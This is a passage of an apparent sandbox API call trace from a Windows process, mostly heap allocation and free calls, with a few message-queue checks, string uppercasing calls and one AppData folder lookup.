(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0154.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0154.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0154.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0154.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0154.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0154.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0154.008] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0154.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0154.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0154.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0154.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0154.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0154.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0154.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0154.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0154.013] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Application Data", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 0x9e1c38 [0154.013] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0154.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.013] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.015] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.015] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.015] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.015] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0154.015] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.015] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0154.015] 